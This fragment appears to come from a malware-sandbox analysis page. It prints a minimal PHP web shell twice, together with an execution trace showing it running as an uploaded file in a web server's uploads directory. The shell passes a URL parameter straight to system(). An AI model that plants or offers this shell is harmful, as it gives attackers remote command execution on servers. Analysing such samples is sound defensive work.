Jump to:
Screenshot
Attributes
Environment
<?php
echo php_uname();
if (isset($_GET['sxc'])) {
system($_GET['sxc']);
}
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:33:40.000261]
1 0 1 0.000178 393464
1 3 0 0.000222 393096 {main} 1 /var/www/html/uploads/1.php 0 0
1 3 1 0.000239 393096
0.000265 314200
TRACE END [2023-02-12 19:33:40.000384]
<html><head></head><body></body></html>
<?
echo php_uname();
if(isset($_GET['sxc'])){
system($_GET['sxc']);
}